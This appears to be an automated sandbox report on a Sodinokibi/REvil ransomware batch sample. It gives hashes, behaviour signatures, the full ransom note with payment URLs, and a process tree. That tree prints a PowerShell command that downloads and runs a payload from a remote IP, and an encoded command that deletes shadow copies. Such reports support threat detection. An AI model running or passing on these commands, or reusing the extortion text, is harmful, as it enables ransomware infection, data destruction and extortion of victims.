Overview

overview

10

Static

static

74b8e8ad8f...94.bat

windows7_x64

10

74b8e8ad8f...94.bat

windows10_x64

10

Analysis

  • max time kernel
    132s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    15-05-2020 19:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    74b8e8ad8fe5aea82ec95a707e3c2b94.bat

  • Size

    214B

  • MD5

    220dc0fc858c664ba5223cbab7e4b312

  • SHA1

    94f095bd648c7c3f4845e3c419b74baa7662f2ae

  • SHA256

    94d89a44ea5da3649df80f6898cb30415f2df92c0060d36d5f9afa3806862a2a

  • SHA512

    119c413acb39f51f4d668c5bc48793f60b91717e1623e22d666221c26e78cfa3667e7aa2141b26e15aa3936d86ba498ae280decd9889a77f8706459d0f295772

Score
10/10
ransomwareevasionspywaretrojansodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/74b8e8ad8fe5aea82ec95a707e3c2b94

Extracted

Path

C:\37e3wa1803-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 37e3wa1803. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/14D2FFAA80AE78FE 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/14D2FFAA80AE78FE Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: qVZSbmiAKvi6H4L/TPWn4ddZrS45ItHmVuNtt1aK1+JIrLAOLmXRxt6iavBMQSuT yq0b0Fp1lQzV5VdtDd0LKKbNvihgFb1a1EZXYpapaVvTJR4kxfjcy5OSx9AgK16d bIuUIvfVw0sMgUi/cVaEsjDI8q0IeS2BbEF34LNVHE+FWDrunjqWgNXsm0oyacsF IiJ2PM6/uqjMhcGZY/CiF69/sFq5M6+X5bprNx1ox5B+jCY+YSS1/wTvp3yuHSJQ 5SmWgitlVv5A0DC4jVScXCT0wbBh16mFpsHJH9mWawrvoogSAGfPF+a+3TsWggeb agtlg9b8mQHtzRFLon1SGOEXLCqcO9M10ABDiT5ThOpHSSQ4BnNSCIaEvHZqXPR5 44aWQze47po89rzKz6RCV98CrJhzIvc1v2rZSkw8Z9fLRVzgMSuqe7kuuxKUrjQV H7cmWhPwq208yQFLKr8r2qGN9suw8Rky0GoNsyaMp3u12Sl9fXAt21HgLLsG/Jcy zlARTWWdiA+JzIzR9kRIgPGnJOFEWhdWVUxtPU9NdhMyDQX9hml27ZjBQ4aAzu2M tdHWCG5cBhrqsCzkgpKKTPKSorxWGxCcv5jQQyidXIKpsEh1gKmz+4UfjAp3fqyj Cxqm/uvZNToTwUye2zd06cB7oTFXHZL6ZzbnG+ud9Xuzfp3+vMTI5wpL2mr9eg3m Hlpp4iIzRZYX9f9ltJW277glZoqORoWIcvfxKFAfCph/SKa0RLVoECMTCQCy1rcY fViKPYGIdonRl8zXKImY8DXwTsljseY1V/fZTaXfyQ44fK12anW7qBc8ZP7JOSxW bmzI/M4mV2VXoPRRFwdx8V3yyXxSvWphYt8miOlmfY9N4Ez6GKtJ5XXaPIKJqWf1 p3IeBN/vQug7LG/IhSSAaRDOavUCOKqrbeKtpi2fEosJDbe1v7CwCBoQGmTDqSFd nemAajLoAYvYN7D3LTlDWoTqvgvS6dG3qknHiuOnb9sbUVCmH7DgMl13j+4rAbJ/ V4JyduDc5v51QzrmWCbsbIzQAy2NM6oDdDQZwk99jqutlVJOTit8sLRML+NzU8qu CiClAPLxdigqI3QTyHjCZW/nZzuKtN/qckxW54bIl6qPrvHOx4LgId2Y3me1PSCl D/5bgqYqxroplAPa0/Y22sN+t8l0Z4mIRxZHDvJpfn6oiPV98kGJwuyy27MV8nr/ AqHwtcud5vlrYhu9Bmt9WU1SjKYX3A0b43SH+bKT5P7JAiemp7flOMXFxLKZYXoQ pAre+68ci3tu6Qm/0/6ksyJz2nKRU8TleQHOgosd1TO6r9BL469q9g== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/14D2FFAA80AE78FE

http://decryptor.cc/14D2FFAA80AE78FE

Signatures

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 67 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in System32 directory 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Drops file in Program Files directory 26 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
    persistence

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\74b8e8ad8fe5aea82ec95a707e3c2b94.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:280
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/74b8e8ad8fe5aea82ec95a707e3c2b94');Invoke-ZUMTYKU;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      • Drops file in System32 directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Drops file in Program Files directory
      • Modifies system certificate store
      PID:1060
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1764
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1604

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit